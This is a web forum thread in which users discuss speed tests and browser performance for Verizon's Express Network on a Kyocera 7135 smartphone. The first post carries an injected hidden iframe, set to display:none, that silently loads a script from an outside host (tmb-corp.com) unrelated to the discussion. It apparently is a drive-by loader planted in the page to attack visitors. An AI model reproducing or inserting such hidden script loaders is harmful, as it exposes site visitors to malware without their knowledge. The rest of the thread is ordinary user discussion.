+ Reply to Thread

Speed Test for VZW Express Network on 7135

Just turned on the switch today. It does seem fast but how fast? I wanted to run a bench mark but the test couldn't complete because I got errors on EIS relating to javascript. I had the checkbox checked for javascript.

Ok, back on track. Whats the best way to test my connection? Anybody, Bueller, Beuller<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

pdageek,

Do you want to test from a PC or from a PDA app? I never tried from a PDA app/browser, but go to

http://home.cfl.rr.com/eaa/Bandwidth.htm

for a list of testers. I use the speakeasy.net ones. I think they all require Java support...

Glenn

Re: Speed Test for VZW Express Network on 7135

Originally posted by pdageek
    Just turned on the switch today. It does seem fast but how fast? I wanted to run a bench mark but the test couldn't complete because I got errors on EIS relating to javascript. I had the checkbox checked for javascript.

Ok, back on track. Whats the best way to test my connection? Anybody, Bueller, Beuller
    Is there any way you could do another video of the EIS browser, but this time on Express Network? I'd like to see a graphics-rich page load on EIS on EN.

Thanks.

Re: Speed Test for VZW Express Network on 7135

Originally posted by pdageek

Ok, back on track. Whats the best way to test my connection? Anybody, Bueller, Beuller
    I thought I saw a post on here where someone connected to broadbandreports.com and used their speed tester. See if that works.

Re: Re: Speed Test for VZW Express Network on 7135

Originally posted by davemayo
    Is there any way you could do another video of the EIS browser, but this time on Express Network? I'd like to see a graphics-rich page load on EIS on EN.

Thanks.
    Sure, sounds like fun. I'll see what I can do tonight. I'll post results from speed test if successful.

Here si the speed when connected to my 7135....

Ok, just kidding, but that is my home connection speed!
    Attached Thumbnails Attached Thumbnails Speed Test for VZW Express Network on 7135-speed.jpg  

Just for comparison, how long should it take on EN for www.cnn.com to load up? I have EN set up, but it doesn't seem much faster than on my old 6035. Can anyone that know they're set up correctly give me a time to compare? Thanks!

Originally posted by The Larch
    Just for comparison, how long should it take on EN for www.cnn.com to load up? I have EN set up, but it doesn't seem much faster than on my old 6035. Can anyone that know they're set up correctly give me a time to compare? Thanks!
    It isn't Express Network that is slow, it is the browsers. When I hook up my phone to my laptop as a modem, it really cooks. Using the EIS or Blazer, there is not a great deal of difference on graphic intensive sites between QNC and Express Network.

For really fast access to CNN news, go to http://wireless.cnn.com/pqa/cnn/en/index.html

Alan

Or is is the 33mhz processor? I haven't been impressed with the "browsing experience" using Express Network and EIS on my 7135. I have been very satisfied using Express Network and Eudora Web though.

Alan--

That CNN site rocks. I think i remember seeing a thread with mobile web sites listed. If not I'm going to create one so everyone can benefit from the sites out there.

Try Xiino. I've discovered that it is about twice as fast than EIS. With qnc, it's reasonably quick, with Express Network, it' great!

A list of mobile sites would be very helpful